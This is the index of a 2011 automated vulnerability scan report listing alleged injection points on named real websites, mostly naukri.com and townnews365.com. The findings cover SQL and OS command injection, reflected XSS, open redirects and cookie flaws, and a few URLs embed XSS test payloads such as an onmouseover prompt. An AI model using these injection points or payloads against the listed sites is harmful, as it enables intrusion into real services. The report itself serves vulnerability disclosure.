XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05152011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sun May 15 06:37:02 CDT 2011.

Loading


1. OS command injection

1.1. http://jobsearch.naukri.com/callcenter-ites-jobs/ [_nkjs cookie]

1.2. http://jobsearch.naukri.com/information-technology-jobs/ [_nkjs cookie]

1.3. http://w28.naukri.com/advertiser/bms_logimpressions.php [banlist parameter]

2. SQL injection

2.1. http://cm.g.doubleclick.net/pixel [REST URL parameter 1]

2.2. http://jobsearch.naukri.com/information-technology-jobs/ [__utmc cookie]

2.3. http://my.naukri.com/EmploymentDetails/view [REST URL parameter 2]

2.4. http://my.naukri.com/NewProfile/listProfiles [User-Agent HTTP header]

2.5. http://search.twitter.com/search.json [Referer HTTP header]

2.6. http://w28.naukri.com/advertiser/bms_hits.php [banner parameter]

2.7. http://www.townnews.com/calendar/asset_manager/event_f229e406-7506-11e0-b056-001cc4c03286.html [REST URL parameter 3]

2.8. http://www.townnews.com/calendar/banner_ad_manager/event_0cadbf96-771e-11e0-855c-001cc4c03286.html [REST URL parameter 2]

2.9. http://www.townnews.com/calendar/business_directory_manager/event_d4277864-771e-11e0-9945-001cc4c03286.html [REST URL parameter 3]

2.10. http://www.townnews.com/calendar/search [User-Agent HTTP header]

2.11. http://www.townnews.com/content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html [name of an arbitrarily supplied request parameter]

2.12. http://www.townnews.com/content_management_solutions/blogs/article_ee26dd4e-6c25-11e0-afd7-001cc4c03286.html [REST URL parameter 1]

2.13. http://www.townnews.com/content_management_solutions/calendar/ [REST URL parameter 1]

2.14. http://www.townnews.com/favicon.ico [TNNoMobile cookie]

2.15. http://www.townnews.com/marketplace/business_434b7195-75b6-5eb4-bb91-74beeb7a6ba6.html [REST URL parameter 1]

2.16. http://www.townnews.com/search/ [l parameter]

2.17. http://www.townnews.com/topic/ [User-Agent HTTP header]

2.18. http://www.townnews.com/users/admin/calendar/event/ [REST URL parameter 4]

2.19. http://www.townnews365.com/advertising_solutions/dotconnect_media [User-Agent HTTP header]

2.20. http://www.townnews365.com/classified_solutions/employment_solutions/employment_classifieds/ [Referer HTTP header]

2.21. http://www.townnews365.com/classified_solutions/employment_solutions/the_job_network/demonstration/ [name of an arbitrarily supplied request parameter]

2.22. http://www.townnews365.com/classified_solutions/employment_solutions/top_jobs/demonstration [Referer HTTP header]

2.23. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login1.jpg [User-Agent HTTP header]

2.24. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [REST URL parameter 4]

2.25. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [REST URL parameter 8]

2.26. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [Referer HTTP header]

2.27. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [__utmc cookie]

2.28. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/usercontrib1.jpg [Referer HTTP header]

2.29. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/usercontrib2.jpg [REST URL parameter 4]

2.30. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/usercontrib2.jpg [name of an arbitrarily supplied request parameter]

2.31. http://www.townnews365.com/content/tncms/live/global/resources/images/icon-05.gif [__utmz cookie]

2.32. http://www.townnews365.com/content/tncms/live/global/resources/images/icon-05.gif [name of an arbitrarily supplied request parameter]

2.33. http://www.townnews365.com/content/tncms/live/user/user_admin-core-base/resources/images/user_70.png [REST URL parameter 3]

2.34. http://www.townnews365.com/content_management_solutions/about_blox/editorial/editorial-core-base/resources/images/user_70.png [REST URL parameter 3]

2.35. http://www.townnews365.com/content_management_solutions/murlinstats/editorial/editorial-core-base/resources/images/user_70.png [REST URL parameter 4]

2.36. http://www.townnews365.com/content_management_solutions/murlinstats/global/resources/styles/print.css [REST URL parameter 6]

2.37. http://www.townnews365.com/content_management_solutions/news/ [Referer HTTP header]

2.38. http://www.townnews365.com/content_management_solutions/news/ [name of an arbitrarily supplied request parameter]

2.39. http://www.townnews365.com/content_management_solutions/reader_commenting/ [REST URL parameter 1]

2.40. http://www.townnews365.com/content_management_solutions/reader_commenting/ [User-Agent HTTP header]

2.41. http://www.townnews365.com/content_management_solutions/topic_page/ [User-Agent HTTP header]

2.42. http://www.townnews365.com/content_solutions/ [name of an arbitrarily supplied request parameter]

2.43. http://www.townnews365.com/creatives_solutions/ [REST URL parameter 1]

2.44. http://www.townnews365.com/creatives_solutions/ad_creation/ [User-Agent HTTP header]

2.45. http://www.townnews365.com/creatives_solutions/enhanced_special_sections/demonstration/ [name of an arbitrarily supplied request parameter]

2.46. http://www.townnews365.com/distribution_solutions/ [name of an arbitrarily supplied request parameter]

2.47. http://www.townnews365.com/distribution_solutions/rss_feeds/ [TNNoMobile cookie]

2.48. http://www.townnews365.com/image_16e69036-3e95-11df-b5f4-001cc4c03286.html [REST URL parameter 1]

2.49. http://www.townnews365.com/mobile/article_1997dfba-5afa-11e0-a3fd-001cc4c03286.html [User-Agent HTTP header]

2.50. http://www.townnews365.com/search/ [f parameter]

2.51. http://www.townnews365.com/shared-content/swfobject/swfobject.js [REST URL parameter 1]

2.52. http://www.townnews365.com/shopping_solutions/yp_top_ads/ [Referer HTTP header]

2.53. http://www.townnews365.com/shopping_solutions/yp_top_ads/demonstration/ [name of an arbitrarily supplied request parameter]

2.54. http://www.townnews365.com/site/affiliates/ [Referer HTTP header]

2.55. http://www.townnews365.com/site/affiliates/ [name of an arbitrarily supplied request parameter]

2.56. http://www.townnews365.com/site/customers [REST URL parameter 1]

2.57. http://www.townnews365.com/site/customers/editorial/editorial-core-base/resources/images/user_70.png [REST URL parameter 2]

2.58. http://www.townnews365.com/site/customers/global/resources/styles/print.css [REST URL parameter 4]

2.59. http://www.townnews365.com/tncms/ads/[random_number]/center-bottom1/3/18/2d9/3182d9b8-a61e-11df-a867-001cc4c002e0-revisions/4c640596327b6.image.png [User-Agent HTTP header]

2.60. http://www.townnews365.com/tncms/ads/[random_number]/center-top1/2/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif [REST URL parameter 5]

2.61. http://www.townnews365.com/tncms/ads/[random_number]/center-top1/2/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif [REST URL parameter 6]

2.62. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/4/06/bd5/406bd50c-5f87-11df-a0e1-001cc4c002e0.image.gif [Referer HTTP header]

2.63. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/5/84/536/58453682-465a-11df-b231-001cc4c03286.image.gif [name of an arbitrarily supplied request parameter]

2.64. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/5/c1/f1b/5c1f1b0e-3e7d-11df-9dd9-001cc4c03286.image.gif [name of an arbitrarily supplied request parameter]

2.65. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/7/71/51c/77151cee-465a-11df-b20f-001cc4c03286.image.jpg [User-Agent HTTP header]

2.66. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif [REST URL parameter 5]

2.67. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif [User-Agent HTTP header]

2.68. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/b/9c/eb0/b9ceb062-4679-11df-8659-001cc4c03286.image.jpg [REST URL parameter 4]

2.69. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/d/7a/1e5/d7a1e5f0-fef8-11de-9e7f-001cc4c002e0.image.jpg [User-Agent HTTP header]

2.70. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/f/06/dcb/f06dcbfc-4346-11df-9060-001cc4c03286.image.gif [User-Agent HTTP header]

2.71. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/f/3a/cdc/f3acdc2e-466e-11df-873f-001cc4c03286.image.jpg [name of an arbitrarily supplied request parameter]

2.72. http://www.townnews365.com/tncms/ads/[random_number]/weather-sponsor1/2/dd/9a2/2dd9a2f2-cf0e-11de-97ca-001cc4c03286.image.gif [REST URL parameter 8]

2.73. http://www.townnews365.com/tncms/ads/[random_number]/weather-sponsor1/4/97/098/4970987c-cf0e-11de-85aa-001cc4c03286.image.gif [REST URL parameter 8]

2.74. http://www.townnews365.com/user-generated_solutions/enhanced_video/demonstration/ [name of an arbitrarily supplied request parameter]

2.75. http://www.townnews365.com/user-generated_solutions/user_account_contributions/ [__utmc cookie]

2.76. http://www.townnews365.com/users/admin/service/purchase/ [service_id parameter]

2.77. http://www.townnews365.com/users/forgot/global/resources/images/icon-03.gif [name of an arbitrarily supplied request parameter]

2.78. http://www.townnews365.com/users/forgot/global/resources/images/icon-04.gif [REST URL parameter 2]

2.79. http://www.townnews365.com/users/login/global/resources/images/icon-03.gif [REST URL parameter 4]

2.80. http://www.townnews365.com/users/login/global/resources/images/icon-04.gif [REST URL parameter 2]

2.81. http://www.townnews365.com/users/login/global/resources/images/icon-05.gif [REST URL parameter 1]

2.82. http://www.townnews365.com/users/login/global/resources/styles/print.css [Referer HTTP header]

2.83. http://www.townnews365.com/users/manage/ [Referer HTTP header]

3. LDAP injection

4. HTTP PUT enabled

5. HTTP header injection

5.1. http://ad.doubleclick.net/getcamphist [src parameter]

5.2. http://c7.zedo.com/img/bh.gif [a parameter]

6. Cross-site scripting (reflected)

6.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [adurl parameter]

6.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [ai parameter]

6.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [client parameter]

6.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [num parameter]

6.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [sig parameter]

6.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.121 [sz parameter]

6.7. http://ad.doubleclick.net/adj/india.reuters.com/widgets [name of an arbitrarily supplied request parameter]

6.8. http://ad.doubleclick.net/adj/india.reuters.com/widgets [sz parameter]

6.9. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

6.10. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

6.11. http://blogs.naukri.com/ [name of an arbitrarily supplied request parameter]

6.12. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

6.13. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

6.14. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]

6.15. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]

6.16. http://hosted.newsgator.com//NGBuzz/gateway.ashx/ngdsr [_dsrId parameter]

6.17. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpck parameter]

6.18. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpck parameter]

6.19. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpck parameter]

6.20. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpvc parameter]

6.21. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpvc parameter]

6.22. http://img.mediaplex.com/content/0/10599/62036/69810_in_sb_fy12q1w5_banner_vostro3500_728x90.html [mpvc parameter]

6.23. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [xz parameter]

6.24. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [xz parameter]

6.25. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [xz parameter]

6.26. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E [REST URL parameter 2]

6.27. http://nmp.newsgator.com/NGBUZZ/buzz.ashx [_dsrId parameter]

6.28. http://nmp.newsgator.com/NGBuzz/Buzz.ashx [buzzId parameter]

6.29. http://nmp.newsgator.com/NGBuzz/Buzz.ashx [name of an arbitrarily supplied request parameter]

6.30. http://www.99labels.com/v1/brand-items.aspx [CategoryID parameter]

6.31. http://www.99labels.com/v1/brand-items.aspx [name of an arbitrarily supplied request parameter]

6.32. http://www.99labels.com/v1/brand-items.aspx [subCategoryID parameter]

6.33. http://www.addthis.com/bookmark.php [REST URL parameter 1]

6.34. http://www.addthis.com/bookmark.php [REST URL parameter 1]

6.35. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

6.36. http://www.classesandcareers.com/schooldegrees/fusion.php [name of an arbitrarily supplied request parameter]

6.37. http://www.naukri.com/tieups/tieups.php [name of an arbitrarily supplied request parameter]

6.38. http://www.policybazaar.com/Default.aspx [__CALLBACKID parameter]

6.39. http://www.quarles.com/ [name of an arbitrarily supplied request parameter]

6.40. http://www.quora.com/up/tchannel4/updates [callback parameter]

6.41. http://www.stowetoday.com/search/opensearch/generic.xml [REST URL parameter 2]

6.42. http://www.townnews.com/shared-content/e-edition/display.php [pub parameter]

6.43. http://www.townnews.com/shared-content/e-edition/display.php [pub parameter]

6.44. http://www.townnews365.com/search/opensearch/generic.xml [REST URL parameter 2]

6.45. http://www.townnews365.com/search/results/ [REST URL parameter 2]

6.46. http://www.townnews365.com/users/login/ [referer_url parameter]

6.47. http://www.townnews365.com/users/login/ [referer_url parameter]

6.48. http://www.vccircle.com/news/startups [name of an arbitrarily supplied request parameter]

6.49. http://www.zoosk.com/d/dating2/35/ [REST URL parameter 2]

6.50. http://www.zoosk.com/d/dating2/35/ [REST URL parameter 3]

6.51. http://www.addthis.com/bookmark.php [Referer HTTP header]

6.52. http://www.addthis.com/bookmark.php [Referer HTTP header]

6.53. http://www.addthis.com/bookmark.php [Referer HTTP header]

6.54. http://seg.sharethis.com/getSegment.php [__stid cookie]

7. Flash cross-domain policy

7.1. http://ad.doubleclick.net/crossdomain.xml

7.2. http://altfarm.mediaplex.com/crossdomain.xml

7.3. http://api.facebook.com/crossdomain.xml

7.4. http://at.amgdgt.com/crossdomain.xml

7.5. http://b.scorecardresearch.com/crossdomain.xml

7.6. http://bh.contextweb.com/crossdomain.xml

7.7. http://c7.zedo.com/crossdomain.xml

7.8. http://d7.zedo.com/crossdomain.xml

7.9. http://d8.zedo.com/crossdomain.xml

7.10. http://dis.criteo.com/crossdomain.xml

7.11. http://dis.us.criteo.com/crossdomain.xml

7.12. http://external.ak.fbcdn.net/crossdomain.xml

7.13. http://fls.doubleclick.net/crossdomain.xml

7.14. http://hosted.newsgator.com/crossdomain.xml

7.15. http://ib.adnxs.com/crossdomain.xml

7.16. http://idcs.interclick.com/crossdomain.xml

7.17. http://images.zwire.com/crossdomain.xml

7.18. http://img-cdn.mediaplex.com/crossdomain.xml

7.19. http://img.mediaplex.com/crossdomain.xml

7.20. http://m8.zedo.com/crossdomain.xml

7.21. http://media2.legacy.com/crossdomain.xml

7.22. http://metrics.blackberry.com/crossdomain.xml

7.23. http://nmp.newsgator.com/crossdomain.xml

7.24. http://omni.accenture.com/crossdomain.xml

7.25. http://pixel.33across.com/crossdomain.xml

7.26. http://platform.ak.fbcdn.net/crossdomain.xml

7.27. http://r1.zedo.com/crossdomain.xml

7.28. http://search.twitter.com/crossdomain.xml

7.29. http://secure-us.imrworldwide.com/crossdomain.xml

7.30. http://segment-pixel.invitemedia.com/crossdomain.xml

7.31. https://tt3.zedo.com/crossdomain.xml

7.32. http://us.blackberry.com/crossdomain.xml

7.33. http://www.blackberry.com/crossdomain.xml

7.34. http://www.vizury.com/crossdomain.xml

7.35. http://yads.zedo.com/crossdomain.xml

7.36. http://yatra.122.2o7.net/crossdomain.xml

7.37. http://ads.adsonar.com/crossdomain.xml

7.38. http://ads.bridgetrack.com/crossdomain.xml

7.39. http://api.tweetmeme.com/crossdomain.xml

7.40. http://buyonline.aegonreligare.com/crossdomain.xml

7.41. http://feeds.bbci.co.uk/crossdomain.xml

7.42. http://googleads.g.doubleclick.net/crossdomain.xml

7.43. https://googleads.g.doubleclick.net/crossdomain.xml

7.44. http://js.adsonar.com/crossdomain.xml

7.45. http://newsrss.bbc.co.uk/crossdomain.xml

7.46. http://pagead2.googlesyndication.com/crossdomain.xml

7.47. http://server.iad.liveperson.net/crossdomain.xml

7.48. http://static.ak.fbcdn.net/crossdomain.xml

7.49. http://www.adobe.com/crossdomain.xml

7.50. http://www.facebook.com/crossdomain.xml

7.51. https://www.facebook.com/crossdomain.xml

7.52. http://www.sapient.com/crossdomain.xml

7.53. http://api.twitter.com/crossdomain.xml

7.54. http://bloxcms.com/crossdomain.xml

7.55. http://services.google.com/crossdomain.xml

7.56. http://stats.wordpress.com/crossdomain.xml

7.57. https://townnews365-dot-com.bloxcms.com/crossdomain.xml

7.58. http://twitter.com/crossdomain.xml

7.59. http://www.stowetoday.com/crossdomain.xml

7.60. http://www.townnews365.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml

8.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

8.3. http://metrics.blackberry.com/clientaccesspolicy.xml

8.4. http://omni.accenture.com/clientaccesspolicy.xml

8.5. http://pixel.33across.com/clientaccesspolicy.xml

8.6. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

8.7. http://stats.wordpress.com/clientaccesspolicy.xml

8.8. http://yatra.122.2o7.net/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://appworld.blackberry.com/webstore/content/19736

9.2. http://appworld.blackberry.com/webstore/content/19736

9.3. http://appworld.blackberry.com/webstore/content/19736

9.4. http://documents.policybazaar.com/

9.5. http://documents.policybazaar.com/Login1.aspx

9.6. http://login.naukri.com/nLogin/Login.php

9.7. http://us.blackberry.com/apps-software/appworld/

9.8. http://www.99labels.com/v1/DeliveryPolicy.aspx

9.9. http://www.99labels.com/v1/brand-items.aspx

9.10. http://www.99labels.com/v1/index.aspx

9.11. http://www.99labels.com/v1/loginpopup.aspx

9.12. http://www.naukri.com/

9.13. http://www.quora.com/

9.14. http://www.quora.com/

9.15. http://www.townnews365.com/users/manage/

10. XML injection

10.1. http://api.facebook.com/restserver.php [format parameter]

10.2. http://cwe.mitre.org/css/main.css [REST URL parameter 1]

10.3. http://cwe.mitre.org/css/main.css [REST URL parameter 2]

10.4. http://cwe.mitre.org/css/print.css [REST URL parameter 1]

10.5. http://cwe.mitre.org/css/print.css [REST URL parameter 2]

10.6. http://cwe.mitre.org/favicon.ico [REST URL parameter 1]

10.7. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [tem parameter]

10.8. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

10.9. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

11. SSL cookie without secure flag set

11.1. https://asia.citi.com/india/Standalone/apply-online-Suvidha-IndianOil-citibank-credit-card.htm

11.2. https://grs.tcs.com/DTOnline/CareersDesign/Jsps/EntryLevel.jsp

11.3. https://townnews365-dot-com.bloxcms.com/users/login/

11.4. https://login.naukri.com/nLogin/Login.php

11.5. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E

11.6. https://www.dropbox.com/referrals

11.7. https://www.facebook.com/login.php

11.8. https://www.facebook.com/recover.php

11.9. https://www.vizury.com/analyze/analyze.php

12. Session token in URL

12.1. https://adsafecontrol.com/login

12.2. http://bh.contextweb.com/bh/set.aspx

12.3. http://l.sharethis.com/pview

12.4. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

12.5. http://nmp.newsgator.com/NGBuzz/Buzz.ashx

12.6. http://static.reuters.com/resources/media/editorial/20080811/deals-widget.html

12.7. http://www.facebook.com/extern/login_status.php

12.8. http://www.google.com/realtimejs

12.9. https://www.kotakcards.com/kotak/px/kotak/applyonline.do

13. SSL certificate

13.1. https://d1gw9egox2swwv.cloudfront.net/

13.2. https://www.facebook.com/

13.3. https://adsafecontrol.com/

13.4. https://ajax.googleapis.com/

13.5. https://asia.citi.com/

13.6. https://careers.accenture.com/

13.7. https://fpdownload.macromedia.com/

13.8. https://googleads.g.doubleclick.net/

13.9. https://grs.tcs.com/

13.10. https://login.naukri.com/

13.11. https://login.zoosk.com/

13.12. https://seal.verisign.com/

13.13. https://ssl.google-analytics.com/

13.14. https://tas-cognizant.taleo.net/

13.15. https://townnews365-dot-com.bloxcms.com/

13.16. https://tt3.zedo.com/

13.17. https://www.dropbox.com/

13.18. https://www.google.com/

13.19. https://www.googleadservices.com/

13.20. https://www.kotakcards.com/

13.21. https://www.vizury.com/

14. ASP.NET ViewState without MAC enabled

14.1. http://www.99labels.com/v1/Visa-Member.aspx

14.2. http://www.policybazaar.com/Default.aspx

14.3. http://www.policybazaar.com/Personal-Loan/UploadDoc.aspx

14.4. http://www.policybazaar.com/agentregister.aspx

14.5. http://www.policybazaar.com/life-insurance/pension-insurance-india.aspx

14.6. http://www.policybazaar.com/life-insurance/term-insurance-india.aspx

14.7. http://www.policybazaar.com/tracker.aspx

14.8. http://www.policybazaar.com/travel-insurance/travel-insurance-india.aspx

14.9. http://www.policybazaar.com/utility/road-assistance-quotes.aspx

14.10. http://www.policybazaar.com/utility/road-assistance-quotes.aspx/%22ns=%22netsparker(0x00207F)

14.11. http://www.policybazaar.com/websitenews/NewsDetails.aspx

15. Open redirection

15.1. http://ad.trafficmp.com/a/bpix [r parameter]

15.2. http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s86852463499098 [vvp parameter]

15.3. http://policybazaar.com/ [name of an arbitrarily supplied request parameter]

16. Cookie scoped to parent domain

16.1. http://api.twitter.com/1/statuses/user_timeline.json

16.2. http://api.twitter.com/1/urls/resolve.json

16.3. http://us.yatra.com/livehelp/include/javascript.php

16.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.121

16.5. http://ad.trafficmp.com/a/bpix

16.6. http://ads.lfstmedia.com/mark/CRITEO_INCL_US

16.7. http://ak1.abmr.net/is/us.blackberry.com

16.8. http://at.amgdgt.com/ads/

16.9. http://b.scorecardresearch.com/b

16.10. http://bh.contextweb.com/bh/set.aspx

16.11. http://c7.zedo.com/img/bh.gif

16.12. http://careers.accenture.com/WebResource.axd

16.13. http://careers.accenture.com/in-en/landing-pages/Pages/careers-at-accenture10.aspx

16.14. http://d7.zedo.com/OzoDB/cutils/R53_5/jsc/1380/egc.js

16.15. http://d7.zedo.com/bar/v16-406/d8/jsc/gl.js

16.16. http://dis.us.criteo.com/dis/dis.aspx

16.17. http://ds.addthis.com/red/psi/p.json

16.18. http://ib.adnxs.com/getuid

16.19. http://ib.adnxs.com/pxj

16.20. http://id.google.com/verify/EAAAAOomJuk-mPSQP0rz42IBQ4Y.gif

16.21. http://idcs.interclick.com/Segment.aspx

16.22. http://login.naukri.com/nLogin/Login.php

16.23. https://login.naukri.com/nLogin/Login.php

16.24. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E

16.25. http://my.naukri.com/faq/faq.php

16.26. http://my.naukri.com/manager/createacc2.php

16.27. http://pixel.33across.com/ps/

16.28. http://pixel.quantserve.com/pixel

16.29. http://pixel.rubiconproject.com/tap.php

16.30. http://pixel.traveladvertising.com/Live/Pixel.aspx

16.31. http://srv.clickfuse.com/pixels/create.php

16.32. https://www.dropbox.com/referrals

16.33. http://www.facebook.com/campaign/landing.php

16.34. http://www.facebook.com/home.php

16.35. http://www.facebook.com/pages/Moline-IL/TownNewscom/98681439791

16.36. https://www.facebook.com/login.php

16.37. https://www.facebook.com/recover.php

16.38. http://www.linkedin.com/company/sapientnitro

16.39. http://www.naukri.com/

16.40. http://www.naukri.com/tieups/tieups.php

16.41. http://www.naukri.com/tieups/tieups.php

16.42. http://www.quora.com/favicon.ico

16.43. http://www.vizury.com/analyze/analyze.php

16.44. https://www.vizury.com/analyze/analyze.php

16.45. http://www.zoosk.com/d/dating2/35/

16.46. http://yads.zedo.com/ads3/a

17. Cookie without HttpOnly flag set

17.1. https://adsafecontrol.com/

17.2. https://asia.citi.com/india/Standalone/apply-online-Suvidha-IndianOil-citibank-credit-card.htm

17.3. http://brothercake.com/site/resources/scripts/onload/

17.4. https://grs.tcs.com/DTOnline/CareersDesign/Jsps/EntryLevel.jsp

17.5. https://townnews365-dot-com.bloxcms.com/users/login/

17.6. http://us.yatra.com/livehelp/include/javascript.php

17.7. http://www.classesandcareers.com/schooldegrees/fusion.php

17.8. https://www.kotakcards.com/kotak/px/kotak/applyonline.do

17.9. http://www.linkedin.com/company/sapientnitro

17.10. http://www.townnews365.com/users/login-success/

17.11. http://ad.doubleclick.net/adi/N3285.google/B2343920.121

17.12. http://ad.trafficmp.com/a/bpix

17.13. http://ad.yieldmanager.com/pixel

17.14. http://ads.bridgetrack.com/track/

17.15. http://ads.lfstmedia.com/mark/CRITEO_INCL_US

17.16. http://adserv.vccircle.com/www/delivery/afr.php

17.17. http://adserv.vccircle.com/www/delivery/ajs.php

17.18. http://adserv.vccircle.com/www/delivery/lg.php

17.19. http://ak1.abmr.net/is/us.blackberry.com

17.20. http://ask.policybazaar.com/

17.21. http://at.amgdgt.com/ads/

17.22. http://b.scorecardresearch.com/b

17.23. http://bh.contextweb.com/bh/set.aspx

17.24. http://c7.zedo.com/img/bh.gif

17.25. http://careers.accenture.com/WebResource.axd

17.26. http://careers.accenture.com/in-en/landing-pages/Pages/careers-at-accenture10.aspx

17.27. http://d7.zedo.com/OzoDB/cutils/R53_5/jsc/1380/egc.js

17.28. http://d7.zedo.com/bar/v16-406/d8/jsc/gl.js

17.29. http://dis.us.criteo.com/dis/dis.aspx

17.30. http://ds.addthis.com/red/psi/p.json

17.31. http://idcs.interclick.com/Segment.aspx

17.32. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E

17.33. http://my.naukri.com/PayCheck/salary

17.34. http://my.naukri.com/faq/faq.php

17.35. http://my.naukri.com/jobTools/web/tools.php/PayCheck/salary

17.36. http://my.naukri.com/manager/createacc2.php

17.37. http://pixel.33across.com/ps/

17.38. http://pixel.quantserve.com/pixel

17.39. http://pixel.rubiconproject.com/tap.php

17.40. http://pixel.traveladvertising.com/Live/Pixel.aspx

17.41. http://srv.clickfuse.com/pixels/create.php

17.42. http://twitter.com/share

17.43. http://www.99labels.com/ScriptResource.axd

17.44. http://www.99labels.com/WebResource.axd

17.45. http://www.99labels.com/v1/ScriptCombiner.axd

17.46. http://www.99labels.com/v1/alertbox/jquery.alerts.css

17.47. http://www.99labels.com/v1/alertbox/jquery.alerts.js

17.48. http://www.99labels.com/v1/css/1366layout.css

17.49. http://www.99labels.com/v1/css/cascade.css

17.50. http://www.99labels.com/v1/css/layout.css

17.51. http://www.99labels.com/v1/jquery/jquery-1.4.2.min.js

17.52. http://www.99labels.com/v1/jquery/jquery-ui-1.8.4.custom.min.js

17.53. http://www.99labels.com/v1/thickbox/thickbox.css

17.54. http://www.facebook.com/home.php

17.55. https://www.facebook.com/login.php

17.56. https://www.facebook.com/recover.php

17.57. http://www.naukri.com/

17.58. http://www.naukri.com/tieups/tieups.php

17.59. http://www.naukri.com/tieups/tieups.php

17.60. http://www.quarles.com/

17.61. http://www.vizury.com/analyze/analyze.php

17.62. https://www.vizury.com/analyze/analyze.php

17.63. http://www.yatra.com/connect/www/content/afr.php

17.64. http://www.yatra.com/connect/www/content/ajs.php

17.65. http://www.yatra.com/connect/www/content/avw.php

17.66. http://www.yatra.com/connect/www/content/avw.php

17.67. http://www.yatra.com/connect/www/content/avw.php

17.68. http://www.yatra.com/connect/www/content/avw.php

17.69. http://www.yatra.com/connect/www/content/avw.php

17.70. http://www.yatra.com/connect/www/content/ck.php

17.71. http://www.yatra.com/connect/www/content/lg.php

17.72. http://www.yatra.com/livehelp/include/status.php

17.73. http://www.zoosk.com/d/dating2/35/

17.74. http://yads.zedo.com/ads3/a

18. Password field with autocomplete enabled

18.1. https://adsafecontrol.com/login

18.2. http://appworld.blackberry.com/webstore/content/19736

18.3. http://appworld.blackberry.com/webstore/content/19736

18.4. http://appworld.blackberry.com/webstore/content/19736

18.5. http://documents.policybazaar.com/

18.6. http://documents.policybazaar.com/Login1.aspx

18.7. http://login.naukri.com/nLogin/Login.php

18.8. https://login.naukri.com/nLogin/Login.php

18.9. https://login.naukri.com/nLogin/Login.php

18.10. https://login.zoosk.com/login.php

18.11. https://login.zoosk.com/signup.php

18.12. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E

18.13. http://twitter.com/

18.14. http://twitter.com/

18.15. http://twitter.com/

18.16. http://us.blackberry.com/apps-software/appworld/

18.17. http://www.99labels.com/v1/DeliveryPolicy.aspx

18.18. http://www.99labels.com/v1/brand-items.aspx

18.19. http://www.99labels.com/v1/index.aspx

18.20. http://www.99labels.com/v1/loginpopup.aspx

18.21. http://www.99labels.com/v1/loginpopup.aspx

18.22. https://www.dropbox.com/

18.23. https://www.dropbox.com/anywhere

18.24. https://www.dropbox.com/apps

18.25. https://www.dropbox.com/apps/64/documents-to-go

18.26. https://www.dropbox.com/contact

18.27. https://www.dropbox.com/help

18.28. https://www.dropbox.com/register

18.29. https://www.dropbox.com/register

18.30. https://www.dropbox.com/team/contact

18.31. http://www.facebook.com/register/fbconnect.php

18.32. http://www.facebook.com/zooskdating

18.33. https://www.facebook.com/login.php

18.34. https://www.facebook.com/recover.php

18.35. http://www.naukri.com/

18.36. http://www.quora.com/

18.37. http://www.quora.com/

18.38. http://www.townnews365.com/users/login/

